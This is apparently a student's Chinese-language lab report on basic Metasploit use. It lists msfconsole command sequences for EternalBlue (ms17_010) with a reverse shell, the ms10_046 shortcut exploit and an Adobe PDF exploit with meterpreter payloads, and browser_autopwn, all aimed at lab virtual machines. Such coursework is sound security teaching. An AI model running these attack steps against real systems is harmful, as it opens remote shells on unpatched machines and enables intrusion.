2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

实践原理

1.MSF攻击方法
  • 主动攻击:扫描主机漏洞,进行攻击
  • 攻击浏览器
  • 攻击其他客户端
2.MSF的六个模块
  • 查看六种模块源码目录/usr/share/metasploit-framework/modules

  • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

  • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提

  • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

  • 空字段模块Nop Modules

  • 编码模块Encoders

  • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

3.MSF的三种用户操作界面
msfconsole
  • 查看模块的具体信息info[exploits|auxiliary|post|payloads|encoders|nops]
  • 查看设置信息show [options]
  • 查看攻击目标类型show [target]
  • 查找命令search
  • 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows armitage
  • 启动服务器service postgresql start
  • 启动armitagearmitage
  • webgui
4.MSF常用漏洞利用命令
  • search name:用指定关键字搜索可以利用的漏洞模块
  • use exploit name:使用漏洞
  • show options:显示配置选项
  • set option name option:设置选项
  • show payloads:回链攻击载荷
  • show targets: 显示目标(os版本)
  • set TARGET target number:设置目标版本
  • exploit:开始漏洞攻击
  • sessions -l:列出会话
  • sessions -i id:选择会话
  • sessions -k id:结束会话
  • Ctrl+z:把会话放到后台
  • Ctrl+c:结束会话
  • show auxiliary:显示辅助模块
  • use auxiliary name :使用辅助模块
  • set option name option:设置选项
  • exploit:运行模块
2.实践内容概述
  • 一个主动攻击实践,如ms08_067; (1分)

  • 一个针对浏览器的攻击,如ms11_050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

3.基础问题回答
  • 用自己的话解释什么是exploit,payload,encode

    • exploit是载具,连接漏洞,将payload传送到靶机中。
    • payload是载荷,是exploitshellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
    • encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实验步骤

实验一:使用ms17_010_eternalblue进行主动攻击

靶机:Windows Server 2008 ,ip地址192.168.216.137

payload:generic/shell_reverse_tcp

  • 进入msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue.rb //使用该模块
  • show payloads //查看载荷
  • set payload generic/shell_reverse_tcp //使用tcp反弹连接
  • set LHOST 192.168.216.130 //设置攻击机的IP,即KALI的IP地址
  • set LPORT 5301 //设置攻击端口
  • set RHOST 192.168.216.137 //设置靶机IP
  • set target 0 //选择自动目标系统类型

  • exploit进行攻击
  • 攻击成功

攻击浏览器的实践

  • ms10_046

  • 靶机:Windows 7 + IE8

  • exploit : exploit/windows/smb/ms10_046_shortcut_icon_dllloader

  • payload : windows/meterpreter/reverse_https

实验步骤
  • search ms10-046//看看其他的exploit
  • use exploit/windows/smb/ms10_046_shortcut_icon_dllloader //使用漏洞
  • show payloads //显示可用攻击载荷
  • set windows/meterpreter/reverse_https //选择攻击载荷
  • show options //查看配置信息
  • set LHOST 192.168.126.130 //设置监听地址
  • set SRVHOST 192.168.126.130 //设置本地收听地址
  • set LPORT //设置端口号
  • exploit #开始攻击

  • 将生成的URL地址在winXP的IE中打开
  • 但是我在ie中打开失败了,更新ie8.0也没有解决
  • 同学说虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功

    攻击客户端的实践

  • Adobe
  • 靶机:Windows XP
  • payload : windows/meterpreter/bind_tcp

实验步骤
  • msfconsole //进入控制台
    -search adobe //进行查找
  • use windows/fileformat/adobe_cooltype_sing //使用漏洞
  • info//查看漏洞具体信息(重点当然是description)
  • set payload windows/meterpreter/bind_tcp //选择攻击载荷
  • show options//查看详细信息
  • set LPORT 5301 //设置端口号
  • set RHOST 192.168.1.148//设置靶机IP地址
  • exploit #攻击

  • 将生成的msf.pdf复制到Windows XP中
  • 攻击成功

browser_autopwn 辅助模块(成功且唯一)

  • 通过search auxiliary 查找辅助模块,找到适合的进行运行
    过程
  • use auxiliary/server/browser_autopwn
  • info
  • set SRVHOST 192.168.216.130
  • set SRVPORT 5301
  • `set LHOST 192.168.216.130
  • run
  • 描述

    描述:这个模块有三个动作。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,然后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印所有利用Web服务器操作将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同

  • 攻击成功

实验总结与体会

本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。这也是实验的乐趣所在。

2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  4. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  5. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  6. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  7. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  9. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

随机推荐

  1. linux虚拟机安装中出现的问题

    当虚拟机加载镜像时,出现下面的错误: vmware 已将该虚拟机配置为使用 64 位客户机操作系统.但是,无法执行 64 位操作. 错误提示:已将该虚拟机配置为使用 64 位客户机操作系统.但是,无法 ...

  2. 浅谈final修饰的变量

    一直大概的知道final关键字的作用,但是自己实际工作中却很少用,除非在声明一些常量值的时候,今天忽然自己在项目中用一个map进行存储一些值.一开始我只是用private修饰的,心里想的是如果fina ...

  3. BZOJ3881 Coci2015Divljak(AC自动机+树上差分+树状数组)

    建出AC自动机及其fail树,每次给新加入的串在AC自动机上经过的点染色,问题即转化为子树颜色数.显然可以用dfs序转成序列问题树状数组套权值线段树解决,显然过不掉.事实上直接树上差分,按dfs序排序 ...

  4. java绘图合并图像AlphaComposite模式测试

    package com.hdwang.test; import javax.swing.*; import javax.swing.event.ChangeEvent; import javax.sw ...

  5. 解题:ZJOI 2006 皇帝的烦恼

    禁止DP,贪心真香 有一个比较明显的贪心思路是让每个人和距离为$2$(隔着一个人)的人尽量用一样的,这样只需要扫一遍然后对每对相邻的人之和取最大值即可.但是当人数为奇数时这样就会出锅,因为最后一个人和 ...

  6. myeclipse和maven的clean和build

    转: 详解myeclipse和maven的clean和build 2018年04月20日 11:33:34 群星坠 阅读数:3529   版权声明:本文为博主原创文章,未经博主允许不得转载. http ...

  7. 日志备份的shell脚本

    以前工作中写的日志备份的脚本,现记录一下日志备份脚本代码,以后工作中遇到遇到需要备份或者清理日志的时候可以拿来简单修改一下使用,减少工作量. 把备份脚本添加到Linux定时任务中,可以定时执行. 日志 ...

  8. jQuery获取radio选中后的文字

    原文链接:http://blog.csdn.net/zhanyouwen/article/details/51393216 jQuery获取radio选中后的文字转载 2016年05月13日 10:3 ...

  9. linux 系统文件类型、系统安装时间、系统启动时间、系统运行时间、设置及显示时间、系统时间和硬件时间

    系统文件类型: 1) $mout 2) df -l:仅列出本地文件系统:-h (--human-readable):-T:文件系统类型 $df -lhf 3) file -s (--special-f ...

  10. SQL Server深入理解“锁”机制

    相比于 SQL Server 2005(比如快照隔离和改进的锁与死锁监视),SQL Server 2008 并没有在锁的行为和特性上做出任何重大改变.SQL Server 2008 引入的一个主要新特 ...